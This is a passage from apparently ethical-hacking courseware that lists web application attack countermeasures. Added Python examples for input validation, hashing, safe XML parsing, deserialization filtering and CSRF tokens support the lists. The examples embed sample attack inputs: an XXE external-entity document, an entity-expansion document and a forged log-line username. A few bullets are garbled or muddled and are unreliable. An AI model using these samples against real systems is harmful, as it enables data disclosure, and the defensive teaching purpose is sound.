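        return (-1, "", str(exc))
    return (result.returncode, result.stdout, result.stderr)


def ping_host(host: str) -> tuple:
    """Validate first, then pass the host as one argument: it can only ever be data."""
    if not validate_hostname(host):
        raise ValueError("invalid hostname")
    return run_safely(["ping", "-c", "1", host])
```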
LDAP Injection Attacks
An LDAP injection attack is similar to an SQL injection: attacks on web applications co-opt the user input to create LDAP queries. Execution of malicious LDAP queries in the applications creates arbitrary queries that disclose information such as username and password, thus granting attackers unauthorized access and admin privileges.

Some countermeasures against LDAP injection attacks are as follows:
○ Perform type, pattern, and domain value validation on all input data
○ Make the LDAP filter as specific as possible
○ Validate and restrict the amount of data returned to the user
○ Implement tight access control on the data in the LDAP directory
○ Perform dynamic testing and source code analysis
○ Sanitize all the user-end inputs and escape any special characters
○ Avoid constructing LDAP search filters by concatenating strings
○ Use the AND filter to enforce restrictions on similar entries
○ Use LDAPS (LDAP over SSL) for encrypting and securing the communication on the web servers
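An added example (not the courseware's code) of the filter-side countermeasures above: pattern validation of the username, RFC 4515 escaping of anything that still goes into a filter, an AND filter that pins the objectClass, and a search request that limits the attributes and number of entries returned. The search-request layout and the inetOrgPerson restriction are assumptions; no directory library is used.

```python
import re

# RFC 4515 escapes; backslash goes first so already escaped output is not escaped twice.
_FILTER_ESCAPES = [("\\", "\\5c"), ("*", "\\2a"), ("(", "\\28"), (")", "\\29"), ("\x00", "\\00")]
USERNAME_RE = re.compile(r"^[a-z][a-z0-9._-]{0,31}$")  # type/pattern validation


def escape_filter_value(value: str) -> str:
    """Escape a value before it is placed inside an LDAP search filter."""
    for char, replacement in _FILTER_ESCAPES:
        value = value.replace(char, replacement)
    return value


def build_login_filter(username: str) -> str:
    """Validate the pattern first, escape anyway (defence in depth), and AND the uid clause
    with an objectClass restriction so the filter stays as specific as possible."""
    if not USERNAME_RE.match(username):
        raise ValueError("username fails pattern validation")
    return "(&(objectClass=inetOrgPerson)(uid=" + escape_filter_value(username) + "))"


def build_login_search(username: str, base_dn: str = "ou=people,dc=example,dc=com") -> dict:
    """Constructed request shape: only the attributes the login flow needs, and at most
    one entry, which restricts the amount of data an injected filter could ever return."""
    return {
        "base": base_dn,
        "scope": "onelevel",
        "filter": build_login_filter(username),
        "attributes": ["uid", "memberOf"],
        "size_limit": 1,
    }
```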
File Injection Attacks
Attackers use scripts to inject malicious files into the server, allowing them to exploit vulnerable parameters and execute malicious code. Such an attack allows temporary data theft and data manipulation, and it can provide attackers with persistent control of the server.

Some countermeasures against file injection attacks are as follows:
○ Strongly validate the user input
○ Consider implementing a chroot jail
○ PHP: Disable allow_url_fopen and allow_url_include in php.ini
○ PHP: Disable register_globals and use E_STRICT to find uninitialized variables
○ PHP: Ensure that all file and stream functions (stream_*) are carefully vetted
Server-Side JS Injection
○ Ensure that user inputs are strictly validated on the server side before processing
○ Avoid using the eval() function to parse the user input
○ Never use commands having identical effects, such as setTimeout(), setInterval(), and Function()
○ Use JSON.parse() instead of eval() to parse the JSON input
○ Make sure to include "use strict" at the beginning of the function to enable the strict mode inside the function scope

Server-Side Include Injection
○ Validate the user input and ensure that it does not include characters used in SSI directives
○ Apply HTML encoding to the user input before executing it in the web pages
○ Ensure that directives are confined only to the web pages where they are required
○ Avoid using pages with file name extensions such as .stm, .shtm, and .shtml to prevent attacks

Server-Side Template Injection
○ Do not create templates from user inputs or pass user inputs as parameters into the templates
○ Use a simple template engine such as Mustache or Python's template if the business requirements support user-submitted templates
○ Review the template engine's documentation for hardening tips
○ Execute the template inside a sandboxed environment
○ Consider loading static template files wherever possible
○ Always make sure to pass dynamic data to a template using the template engine's built-in functionality

Log Injection
○ Pass log codes instead of messages through parameters
○ Use correct and easily recognizable error codes
○ Avoid using API calls to log actions due to their visibility in browser network calls
○ Make sure to pass user IDs or publicly non-identifiable inputs as the parameters at logging endpoints
○ Validate inputs at both the server side and the client side and sanitize and replace the malicious characters

HTML Injection
○ Carefully examine the application for any vulnerabilities that are used to render logs
○ Validate all the user inputs to remove the HTML-syntax substrings from user-supplied text
○ Check the inputs for unwanted script or HTML code such as <script></script>, <html></html>
○ Employ security solutions that avoid false positives and detect possible injections

CRLF Injection
○ Use any function to encode CRLF special characters and avoid using the user input in the response headers
○ Update to a version of the programming language that disallows the injection of CR (carriage return) and LF (line feed) characters
○ Rewrite the code so that the user's content is not directly used in the HTTP stream
○ Check and remove any newline strings in the content before passing it to the HTTP header
○ Encrypt the data that is passed to the HTTP headers to manipulate the CR and LF codes
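One added example (not code from the courseware) serving both the Log Injection and the CRLF Injection lists above: a header-value check that refuses CR, LF and other control characters before a value is placed in the HTTP stream, and a log sanitizer that encodes the same characters so user text cannot forge an extra log line, used by a log call that takes an event code and a user ID rather than a free-text message. Function names and the log line layout are assumptions for the demo.

```python
import re

# CR, LF and every other C0/DEL control character.
_CTRL = re.compile(r"[\x00-\x1f\x7f]")


def safe_header_value(value: str) -> str:
    """Reject any control character so a value can never terminate the header line
    and start a new one (for example an injected Set-Cookie)."""
    if _CTRL.search(value):
        raise ValueError("control characters are not allowed in header values")
    return value


def sanitize_for_log(value: str, max_len: int = 200) -> str:
    """Encode newlines and other control characters, and bound the length, so one
    event cannot forge additional log lines or flood the log."""
    return _CTRL.sub(lambda m: "\\x%02x" % ord(m.group()), value[:max_len])


def build_redirect_headers(location: str) -> list:
    """Headers for a redirect whose target came from user input."""
    return [("Location", safe_header_value(location)), ("Cache-Control", "no-store")]


def audit_line(event_code: str, user_id: str, detail: str) -> str:
    """Log codes and IDs go in as parameters; any free-text detail is sanitized."""
    return "event=%s user=%s detail=%s" % (event_code, sanitize_for_log(user_id), sanitize_for_log(detail))
```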

Web Application Attack Countermeasures

Broken Authentication and Session Management
Flaws in authentication and session management application functions allow attackers to gain passwords, keys, and session tokens or exploit other implementation vulnerabilities to gain other users' credentials.
Session cookies are destined for client IPs by delivering a validation cookie, which includes a cryptographic token that verifies that the client IP is the one to which the session token was issued. Therefore, to perform the session attack, the attacker must steal the IP address of the target user.

Some countermeasures against broken authentication and session management attacks are as follows:
○ Use SSL for all authenticated parts of the application
○ Verify whether all the users' identities and credentials are stored in a hashed form
○ Never submit session data as part of a GET, POST
○ Apply passphrasing with at least five random words
○ Limit the login attempts and lock the account for a specific period after a certain number of failed attempts
○ Use a secure platform session manager to generate long random session identifiers for secure session development
○ Implement multi-factor authentication mechanisms to prevent credential guessing, stuffing, and brute-forcing
○ Make sure to secure passwords with a cryptographic password hash algorithm or tools such as bcrypt, scrypt, or Argon2
○ Make sure to check passwords against a list of the top probable bad passwords
○ Log authentication failures and send alerts whenever attacks are detected
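Several of the countermeasures above in one added example (not the courseware's code): scrypt password hashing with a per-user salt, a bad-password check, long random session identifiers, and a login guard that locks the account after repeated failures and returns the outcome that should be logged and alerted on. The bad-password list, lockout parameters, and storage format are constructed for the demo; hashlib.scrypt is used because it ships with the standard library.

```python
import hashlib
import hmac
import os
import secrets
import time

# Constructed stand-in for a "top bad passwords" list; load a real list from a file.
TOP_BAD_PASSWORDS = {"123456", "password", "qwerty", "letmein", "welcome", "admin"}
MAX_FAILED_ATTEMPTS = 5
LOCKOUT_SECONDS = 900
SCRYPT_PARAMS = dict(n=2 ** 14, r=8, p=1, dklen=32)


def password_is_acceptable(password: str) -> bool:
    """Reject list entries; favour long passphrases."""
    return len(password) >= 12 and password.lower() not in TOP_BAD_PASSWORDS


def hash_password(password: str, salt: bytes = None) -> str:
    """Memory-hard scrypt with a random 16-byte salt; stored as 'scrypt$salt$digest'."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.scrypt(password.encode(), salt=salt, **SCRYPT_PARAMS)
    return "scrypt$" + salt.hex() + "$" + digest.hex()


def verify_password(password: str, stored: str) -> bool:
    _, salt_hex, digest_hex = stored.split("$")
    candidate = hashlib.scrypt(password.encode(), salt=bytes.fromhex(salt_hex), **SCRYPT_PARAMS)
    return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))


def new_session_id() -> str:
    """Long random session identifier (256 bits) from the OS CSPRNG."""
    return secrets.token_urlsafe(32)


class LoginGuard:
    """Counts failures per account and locks the account for LOCKOUT_SECONDS."""

    def __init__(self):
        self.failures = {}  # username -> (failure count, locked_until timestamp)

    def attempt(self, username: str, password: str, stored_hash: str, now=None) -> str:
        now = time.time() if now is None else now
        count, locked_until = self.failures.get(username, (0, 0.0))
        if now < locked_until:
            return "locked"
        if verify_password(password, stored_hash):
            self.failures.pop(username, None)
            return "ok"
        count += 1
        locked_until = now + LOCKOUT_SECONDS if count >= MAX_FAILED_ATTEMPTS else 0.0
        self.failures[username] = (count, locked_until)
        return "locked" if locked_until else "failed"  # both outcomes are what you log and alert on
```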
Sensitive Data Exposure
Many web applications do not properly protect sensitive data such as credit card numbers, SSNs, and authentication credentials with appropriate encryption or hashing. Attackers may steal or modify such weakly protected data to conduct identity theft, credit card fraud, or other crimes.

Some countermeasures against sensitive data exposure attacks are as follows:
○ Do not create or use weak cryptographic algorithms
○ Generate encryption keys offline and store them securely
○ Ensure that encrypted data stored on the disk is not easy to decrypt
○ Use AES encryption for stored data and use TLS with HSTS (HTTP Strict Transport Security) for incoming traffic
○ Classify the data processed, stored, or transmitted by an application and apply controls accordingly
○ Use PCI DSS compliant tokenization or truncation to remove the data soon after its requirement

Useproperkey management a re in place
andensure thatall the keys
Encrypt
all the datain transit usingTLSwith PerfectForwardSecrecy (PFS)
ciphers
Disablecaching
techniques
for requests
that contain sensitive information
XML External Entity
- Avoid processing XML input containing references to external entities by a weakly configured XML parser
- The XML unmarshaller should be configured securely
- Parse the document with a securely configured parser
- Configure the XML processor to use a local static DTD and disable any declared DTD included in an XML document
- Implement whitelisting, input validation, filtering, and sanitization techniques to prevent hostile data within the XML documents
- Update and patch the latest XML processors and libraries
- Make sure that the XML/XSL file upload function validates the XML using XSD validation
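The "disable any declared DTD" countermeasure above, shown in Python with the standard-library expat parser as an added example (not courseware code). The three sample documents are constructed; the external-entity one points at a placeholder path that is never fetched because the DOCTYPE is refused first.

```python
import xml.parsers.expat


class UnsafeXMLError(ValueError):
    """Raised for any document that a hardened parser should refuse."""


def parse_untrusted_xml(data: bytes) -> dict:
    """Parse XML from an untrusted source, refusing DTDs and entity declarations.

    Rejecting the DOCTYPE up front means SYSTEM/PUBLIC external entities, parameter
    entities and entity-expansion payloads are never processed at all. The return
    value is a small summary: the root element name and the text of its direct children.
    """
    parser = xml.parsers.expat.ParserCreate()
    summary = {"root": None, "children": {}}
    stack = []
    text = []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # Fires before the internal subset is read, so nothing inside it is parsed.
        raise UnsafeXMLError(f"DOCTYPE {name!r} is not allowed in untrusted input")

    def on_entity_decl(*args):
        raise UnsafeXMLError("entity declarations are not allowed in untrusted input")

    def on_external_entity_ref(context, base, system_id, public_id):
        # Returning 0 reports the reference as unresolvable, so expat never fetches it.
        return 0

    def on_start(name, attrs):
        if summary["root"] is None:
            summary["root"] = name
        stack.append(name)
        text.clear()

    def on_end(name):
        stack.pop()
        if len(stack) == 1:            # direct child of the root element
            summary["children"][name] = "".join(text).strip()
        text.clear()

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_entity_ref
    parser.StartElementHandler = on_start
    parser.EndElementHandler = on_end
    parser.CharacterDataHandler = text.append
    try:
        parser.Parse(data, True)
    except xml.parsers.expat.ExpatError as exc:
        raise UnsafeXMLError(f"malformed XML: {exc}") from exc
    return summary


# Constructed sample inputs for the example.
SAFE_DOC = b"<user><name>alice</name><role>viewer</role></user>"
DOCTYPE_DOC = (b'<?xml version="1.0"?>'
               b'<!DOCTYPE d [<!ENTITY ext SYSTEM "file:///constructed/placeholder">]>'
               b"<d>&ext;</d>")
EXPANSION_DOC = (b'<!DOCTYPE d [<!ENTITY a "aaaa"><!ENTITY b "&a;&a;&a;&a;">]>'
                 b"<d>&b;</d>")


def is_refused(doc: bytes) -> bool:
    """True when the hardened parser rejects the document."""
    try:
        parse_untrusted_xml(doc)
    except UnsafeXMLError:
        return True
    return False
```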
Broken Access Control
- Perform access control checks before redirecting the authorized user to the requested resource
- Avoid using insecure IDs to prevent the attacker from guessing them
- Provide a session timeout mechanism
- Limit file permissions to authorized users to avoid misuse
- Avoid client-side caching mechanisms
- Remove session tokens on the server side on user logout
- Ensure that minimum privileges are assigned to users to perform only essential actions
- Enforce access control mechanisms once and re-use them throughout the application
Security Misconfiguration
Security misconfiguration potentially makes web applications vulnerable and may provide attackers with access to them as well as to files and other application-controlling functions. Insufficient transport layer protection allows attackers to obtain unauthorized access to sensitive information as well as to perform attacks such as account theft, phishing, and compromising admin accounts. Encrypt all communications between the website and client to prevent attacks due to insufficient transport layer protection.
Some countermeasures against security misconfiguration attacks are as follows:
- Configure all security mechanisms and disable all unused services
- Set up roles, permissions, and accounts and disable all default accounts or change their default passwords
- Scan for the latest security vulnerabilities and apply the latest security patches
- Non-SSL requests to web pages should be redirected to the SSL page
- Set the 'secure' flag on all sensitive cookies
- Configure the SSL provider to support only strong algorithms
- Ensure that the certificate is valid and not expired, and that it matches all domains used by the site
- Backend technologies and other connections should also use SSL or other encryption
XSS Attacks
XSS is another type of input validation attack that targets the flawed input validation mechanism of web applications for the purpose of malicious activities. Attackers embed malicious script into a web application's input gates, which allows them to bypass the security measures imposed by the applications.
Some countermeasures against XSS attacks are as follows:
- Validate all headers, cookies, query strings, form fields, and hidden fields (i.e., all parameters) against a rigorous specification
- Use testing tools extensively during the design phase to eliminate such XSS holes in the application before it goes into use
- Use a web application firewall to block the execution of a malicious script
- Convert all non-alphanumeric characters into HTML character entities before displaying the user input in search engines and forums
- Encode the input and output and filter metacharacters in the input
- Never trust websites that use HTTPS when it comes to XSS
- Filtering the script output can also defeat XSS vulnerabilities by preventing them from being transmitted to users
- Deploy public key infrastructure (PKI) for authentication, which checks to ascertain that the script introduced is actually authenticated
- Implement a stringent security policy
Web servers, application servers, and web application environments are vulnerable to cross-site scripting. It is difficult to identify and remove XSS flaws from web applications. The best way to find flaws is to perform a security review of the code and search in all the places where the input from an HTTP request comes as an output through HTML.
Attackers use a variety of HTML tags to transmit malicious JavaScript. Nessus, Nikto, and other tools can help to some extent in scanning websites for these flaws. If the scanning discovers a vulnerability in a website, it is highly likely to be vulnerable to other attacks.
Review the website code to defend against XSS attacks. Check the robustness of the code by reviewing it and comparing it against exact specifications. Check the following areas: headers, cookies, query string, form fields, and hidden fields. During the validation process, there must be no attempt to recognize the active content, either by removing the filter or by sanitizing it.
There are many ways to encode known filters for active content. A "positive security policy" is highly recommended, which specifies what is allowed and what must be removed. Negative or attack-signature-based policies are difficult to maintain, as they are incomplete.
Input fields should be limited to a maximum size since most script attacks need several characters to initiate.
- Implement Content Security Policy (CSP) to prevent the browser from executing XSS attacks
- Escape untrusted HTTP request data based on the context in the HTML output to resolve Reflected and Stored XSS vulnerabilities
- Employ context-sensitive encoding when altering the browser document on the client side, which acts against DOM-XSS
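Context-sensitive output encoding, the countermeasure the last three bullets describe, as an added Python example (not courseware code): one encoder per output context, plus the blunter "every non-alphanumeric character to an entity" rule from the list above. The search-page template and the inputs are constructed for the demonstration.

```python
import html


def encode_for_html_body(value: str) -> str:
    """Text between tags: entity-escape &, <, >, \" and ' (html.escape with quote=True)."""
    return html.escape(value, quote=True)


def encode_for_html_attribute(value: str) -> str:
    """Value inside a double-quoted attribute. Same escaping; the template must always
    emit the surrounding quotes, because unquoted attributes end at the first space."""
    return html.escape(value, quote=True)


_JS_SAFE = set("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789,._ ")


def encode_for_js_string(value: str) -> str:
    """Value inside a JavaScript string literal in a <script> block. Everything outside a
    conservative allow-list becomes \\uXXXX, so neither quotes nor '</script>' can close
    the literal or the script element."""
    out = []
    for ch in value:
        if ch in _JS_SAFE:
            out.append(ch)
            continue
        cp = ord(ch)
        if cp > 0xFFFF:                     # astral plane: emit a UTF-16 surrogate pair
            cp -= 0x10000
            out.append(f"\\u{0xD800 + (cp >> 10):04x}\\u{0xDC00 + (cp & 0x3FF):04x}")
        else:
            out.append(f"\\u{cp:04x}")
    return "".join(out)


def non_alnum_to_entities(value: str) -> str:
    """The list's blunter rule: every non-alphanumeric character becomes a numeric entity
    before the value is displayed (e.g. in search results or forum posts)."""
    return "".join(ch if ch.isalnum() else f"&#{ord(ch)};" for ch in value)


def render_search_page(query: str) -> str:
    """Constructed template reflecting one user value into three different contexts,
    each through the encoder that matches that context."""
    return (
        "<p>Results for: " + encode_for_html_body(query) + "</p>\n"
        '<input type="text" name="q" value="' + encode_for_html_attribute(query) + '">\n'
        '<script>var lastQuery = "' + encode_for_js_string(query) + '";</script>'
    )
```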
Insecure Deserialization
- Validate untrusted input that is to be serialized to ensure that the serialized data contains only trusted classes
- Deserialization of trusted data must cross a trust boundary
- Developers must re-architect their applications
- Avoid serialization for security-sensitive classes
- Guard sensitive data during deserialization
- Filter untrusted serial data
- Enforce duplicate security manager checks in a class during serialization and deserialization
- Understand the security permissions given to serialization and deserialization
- Implement integrity checks or encryption of the serialized objects to prevent modification of the serialized data or hostile object creation
- Isolate code that deserializes so that it runs in very-low-privileged environments
- Log the deserialization exceptions and failures so that the incoming type is not the same as the expected type; otherwise, it throws an exception
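Two of the controls above, an integrity check on the serialized bytes and a trusted-class filter during deserialization, worked through for Python's pickle as an added example (not courseware code). The `Session` class, the signing key and the tampering helper are constructed for the demonstration.

```python
import datetime
import hashlib
import hmac
import io
import pickle
from dataclasses import dataclass

# Constructed key; in production it comes from a secrets store, never from source.
SIGNING_KEY = b"constructed-serialization-signing-key"
TAG_LEN = 32   # bytes of HMAC-SHA256 prefixed to every blob


@dataclass
class Session:
    user: str
    role: str


# Allow-list of classes the unpickler may resolve; anything else is refused.
ALLOWED_CLASSES = {(__name__, "Session")}


class RestrictedUnpickler(pickle.Unpickler):
    """pickle resolves every class by name through find_class; overriding it is the hook
    that turns 'arbitrary object' deserialization into 'trusted classes only'."""

    def find_class(self, module, name):
        if (module, name) in ALLOWED_CLASSES:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refusing to deserialize {module}.{name}")


def serialize(obj) -> bytes:
    body = pickle.dumps(obj, protocol=4)
    tag = hmac.new(SIGNING_KEY, body, hashlib.sha256).digest()
    return tag + body


def deserialize(blob: bytes):
    """Integrity first: a modified body fails the MAC before any byte reaches the unpickler.
    The class filter then applies even to correctly signed data (defence in depth)."""
    tag, body = blob[:TAG_LEN], blob[TAG_LEN:]
    expected = hmac.new(SIGNING_KEY, body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("integrity check failed: serialized data was modified")
    return RestrictedUnpickler(io.BytesIO(body)).load()


def foreign_class_blob() -> bytes:
    """A correctly signed blob of a class outside the allow-list (constructed for the test)."""
    return serialize(datetime.date(2020, 1, 1))


def tampered(blob: bytes) -> bytes:
    """Flip one bit in the body: a stand-in for someone editing the stored payload."""
    return blob[:-1] + bytes([blob[-1] ^ 0x01])


def load_outcome(blob: bytes) -> str:
    """Classify what deserialize() does with a blob: 'ok', 'tampered' or 'refused'.
    The failure kinds are what the text says to log."""
    try:
        deserialize(blob)
        return "ok"
    except ValueError:
        return "tampered"
    except pickle.UnpicklingError:
        return "refused"
```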
Using Components with Known Vulnerabilities
- Regularly check the versions of both client-side and server-side components and their dependencies
- Continuously monitor sources such as the National Vulnerability Database (NVD) for vulnerabilities in your components
- Apply security patches regularly
- Scan the components with security scanners frequently
- Enforce security policies and best practices for component use
- Review all the dependencies including transitive dependencies and ensure that they are not vulnerable
- Maintain a regular inventory of the versions of both client-side and server-side components
- Make sure to obtain components from official sources and accept only signed packages
Insufficient Logging and Monitoring
- Define the scope of assets covered in log monitoring to include business-critical areas
- Set up a minimum baseline for logging and ensure that it is followed for all assets
- Ensure that logs are logged with user context so that they are traceable for specific accounts
- Ascertain what to log and what log to look for through proactive incident identification
- Perform sanitization on all event data to prevent log injection attacks
- Implement a common logging mechanism for the whole application and use effective incident response
- Ensure all logins, access control failures, and input validation failures can be logged with the necessary user context to identify suspicious accounts
- Make sure that high-value transactions consist of an audit trail with integrity controls to prevent tampering of the databases, such as append-only database tables
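The log-injection sanitization and user-context points above, as an added Python example (not courseware code): one sanitizer feeding both a JSON-lines formatter and a plain key="value" formatter. The forged-username input is constructed to show what an injection attempt looks like once neutralized.

```python
import json
import re

_CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")


def sanitize_field(value, max_len: int = 200) -> str:
    """Neutralize log injection: every control character (CR, LF, ESC, NUL, ...) becomes a
    visible \\xNN escape, so one event can never span, forge or overwrite another log
    line, and over-long values are truncated so a sink cannot be flooded."""
    cleaned = _CONTROL_CHARS.sub(lambda m: "\\x%02x" % ord(m.group()), str(value))
    return cleaned if len(cleaned) <= max_len else cleaned[:max_len] + "..."


def _quoted(value) -> str:
    """For the text format: escape backslash and double quote so a value cannot end early."""
    return '"' + sanitize_field(value).replace("\\", "\\\\").replace('"', '\\"') + '"'


def format_event(event: str, user: str, source_ip: str, **fields) -> str:
    """One JSON object per line, always carrying user context (account and source address),
    which is what makes an access-control or validation failure traceable to an account."""
    record = {"event": event, "user": sanitize_field(user), "src": sanitize_field(source_ip)}
    record.update({k: sanitize_field(v) for k, v in fields.items()})
    return json.dumps(record, ensure_ascii=True)


def format_event_text(event: str, user: str, source_ip: str, **fields) -> str:
    """The same event as a classic key="value" line, where the sanitizer alone is the
    defence because a plaintext sink gets no escaping from a serializer."""
    parts = [f"event={_quoted(event)}", f"user={_quoted(user)}", f"src={_quoted(source_ip)}"]
    parts += [f"{k}={_quoted(v)}" for k, v in fields.items()]
    return " ".join(parts)


# Constructed input: a username crafted to look like the end of one line plus a
# second, forged "login_ok for admin" line.
INJECTED_USERNAME = 'bob" src="10.0.0.9"\nevent="login_ok" user="admin'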
Directory Traversal
Directory traversal enables attackers to exploit HTTP, gain access to restricted directories, and execute commands outside the web server's root directory. Developers must configure web applications and their servers with appropriate file and directory permissions to avoid directory traversal vulnerabilities.
Some countermeasures against directory traversal attacks are as follows:
- Define access rights to the protected areas of the website
- Apply checks/hotfixes that prevent exploitation of vulnerabilities such as Unicode, which affect the directory traversal
- Web servers should be updated with security patches in a timely manner
- Validate the user input before processing by comparing it with the whitelist and verify that the input contains only purely alphanumeric characters
- Append the input of the application to the base directory and use the platform filesystem API to canonicalize the path
- Use an advanced content management system (CMS) for handling several documents
- Host documents on a separate file server or cloud storage to prevent mixing of public and sensitive documents
- Properly sanitize the file names coming from HTTP requests
- Restrict filenames to a list of known good characters and ensure that any references to files use only these characters
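The "append to the base directory and canonicalize with the platform filesystem API" and "known good characters" countermeasures above, combined in Python as an added example (not courseware code). The document-root layout, including the symlink that escapes it, is constructed in a temporary directory for the demonstration.

```python
import os
import re
import tempfile

SAFE_NAME = re.compile(r"^[A-Za-z0-9_.-]{1,64}$")


class PathTraversalError(ValueError):
    pass


def resolve_document(base_dir: str, requested: str) -> str:
    """Map a user-supplied document name onto a path inside base_dir, or raise.

    Two independent checks, as the text recommends: (1) the name must consist only of
    known-good characters; (2) append it to the base directory, canonicalize through the
    platform filesystem API (realpath resolves '..' and symlinks) and verify the result
    is still under the base directory.
    """
    if requested in (".", "..") or not SAFE_NAME.match(requested):
        raise PathTraversalError(f"rejected file name: {requested!r}")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, candidate]) != base:
        raise PathTraversalError(f"resolves outside the document root: {requested!r}")
    return candidate


def is_rejected(base_dir: str, requested: str) -> bool:
    try:
        resolve_document(base_dir, requested)
    except PathTraversalError:
        return True
    return False


def make_sandbox():
    """Constructed layout: <root>/docs/public.txt, <root>/private/secret.txt and, where the
    platform allows it, a symlink docs/escape -> ../private. Returns (docs, has_symlink)."""
    root = tempfile.mkdtemp()
    docs = os.path.join(root, "docs")
    private = os.path.join(root, "private")
    os.makedirs(docs)
    os.makedirs(private)
    with open(os.path.join(docs, "public.txt"), "w") as fh:
        fh.write("public document")
    with open(os.path.join(private, "secret.txt"), "w") as fh:
        fh.write("not for the web")
    try:
        os.symlink(private, os.path.join(docs, "escape"))
        has_symlink = True
    except (OSError, NotImplementedError, AttributeError):
        has_symlink = False
    return docs, has_symlink
```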
Unvalidated Redirects and Forwards
In general, web applications redirect and forward users to other pages and websites. Therefore, if a web application does not validate the data, then attackers can redirect users to malicious websites or use forwarding to access unauthorized pages. Therefore, to prevent such attacks, it is best not to allow users to directly supply parameters to redirect and forward in web application logic.
Some countermeasures against unvalidated redirects and forwards attacks are as follows:
- Avoid using redirects and forwards
- If the destination parameters cannot be avoided, ensure that the supplied value is valid and authorized for the user
- Avoid allowing URL as a user input for the destination and validate the URL
- Sanitize the input by generating a list of trusted URLs that includes a list of hosts or regex
- Implement meta refresh in the page, as it can use hardcoded HTML to automatically redirect users to another page
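A redirect-target validator built on a trusted-host list, as the bullets above recommend, added here as a Python example (not courseware code). The host allow-list and default landing page are constructed; the checks cover the inputs that usually fool such validators (scheme-relative URLs, backslashes, userinfo, non-http schemes, header-splitting characters).

```python
from urllib.parse import urlsplit, urlunsplit

# Constructed allow-list of hosts this application is permitted to redirect to.
TRUSTED_HOSTS = {"www.example.com", "accounts.example.com"}
DEFAULT_TARGET = "/home"


def safe_redirect_target(url: str) -> str:
    """Return a redirect target that is either a site-relative path or an https URL whose
    host is on TRUSTED_HOSTS; anything else collapses to DEFAULT_TARGET."""
    if not url or any(c in url for c in "\r\n\x00"):
        return DEFAULT_TARGET            # empty, or could split the Location header
    # Browsers treat backslashes as slashes; normalize first so '/\\host' parses as a netloc.
    normalized = url.replace("\\", "/")
    parts = urlsplit(normalized)
    if parts.scheme == "" and parts.netloc == "":
        # Site-relative path: exactly one leading slash ('//host' is scheme-relative).
        if normalized.startswith("/") and not normalized.startswith("//"):
            return urlunsplit(("", "", parts.path, parts.query, parts.fragment))
        return DEFAULT_TARGET
    if parts.scheme not in ("", "http", "https"):
        return DEFAULT_TARGET            # javascript:, data:, ...
    if parts.username is not None or parts.password is not None:
        return DEFAULT_TARGET            # 'https://www.example.com@other.host/'
    host = (parts.hostname or "").lower()
    if host not in TRUSTED_HOSTS:
        return DEFAULT_TARGET
    try:
        port = parts.port
    except ValueError:                   # non-numeric port
        return DEFAULT_TARGET
    netloc = host if port is None else f"{host}:{port}"
    # Rebuild rather than echo the input, and always upgrade to https.
    return urlunsplit(("https", netloc, parts.path or "/", parts.query, parts.fragment))
```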
Watering Hole Attack
- Apply software patches regularly to remove any vulnerabilities
- Monitor network traffic
- Secure the DNS server to prevent attackers from redirecting the site to a new location
- Analyze user behavior
- Inspect popular websites
- Use browser plug-ins that block HTTP redirects
- Disable third-party services such as content advertising, which track user activities
- Make sure to hide online activities with a VPN and enable the browser's private browsing feature
- Make sure to run the web browser in a virtual environment to limit access to the local system
Cross-Site Request Forgery
Using a CSRF attack, attackers lure a user's browser into sending a fake HTTP request, including the user session cookie and other authentication information, to a legitimate (vulnerable) web application to perform malicious activities.
Some countermeasures against cross-site request forgery attacks are as follows:
- Log off immediately after using a web application and clear the history
- Do not allow your browser and website to save login details
- Check the HTTP Referrer header and, when processing a POST, ignore URL parameters
- Use flags such as HttpOnly
- Use referer headers that send custom headers such as an X-Requested-With header using jQuery
- Use CSRF tokens such as nonce tokens that are submitted through the hidden form field to avoid illegal access
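The server side of the nonce-token, Referer-check and POST-only countermeasures above, as an added Python example (not courseware code). The site origin, the signing key and the dict-based request stand-ins are constructed for the demonstration.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

# Constructed values: the site's own origin and the server-side signing key
# (in production the key comes from configuration, never from source).
SITE_ORIGIN = "https://www.example.com"
CSRF_SECRET = b"constructed-csrf-signing-key"


def new_session_id() -> str:
    return secrets.token_urlsafe(32)


def csrf_token_for(session_id: str) -> str:
    """Nonce token bound to the session: nonce.HMAC(secret, session:nonce). The form embeds
    it in a hidden field; a token lifted from another session fails verification."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(CSRF_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def csrf_token_is_valid(session_id: str, token: str) -> bool:
    if not token or "." not in token:
        return False
    nonce, mac = token.split(".", 1)
    expected = hmac.new(CSRF_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)


def hidden_field(token: str) -> str:
    """Markup for the hidden form field that carries the token back on submit."""
    return f'<input type="hidden" name="csrf_token" value="{token}">'


def _same_origin(header_value: str) -> bool:
    p = urlsplit(header_value)
    return f"{p.scheme}://{p.netloc}" == SITE_ORIGIN


def accept_state_changing_request(method: str, headers: dict, form: dict, cookies: dict):
    """Gate for a state-changing request. headers/form/cookies are plain dicts standing in
    for a framework request object. Returns (accepted, reason)."""
    if method.upper() != "POST":
        return False, "state changes must be POSTed; URL parameters are ignored"
    session_id = cookies.get("session")
    if not session_id:
        return False, "no session"
    # Origin/Referer, when the browser sends one, must name this site.
    origin = headers.get("Origin") or headers.get("Referer")
    if origin and not _same_origin(origin):
        return False, "cross-site Origin/Referer"
    # The hidden-field nonce is mandatory. X-Requested-With is only an extra signal for
    # AJAX callers, since a plain cross-site form post cannot set custom headers.
    if not csrf_token_is_valid(session_id, form.get("csrf_token", "")):
        return False, "missing or invalid CSRF token"
    return True, "ok"
```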
Cookie/Session Poisoning
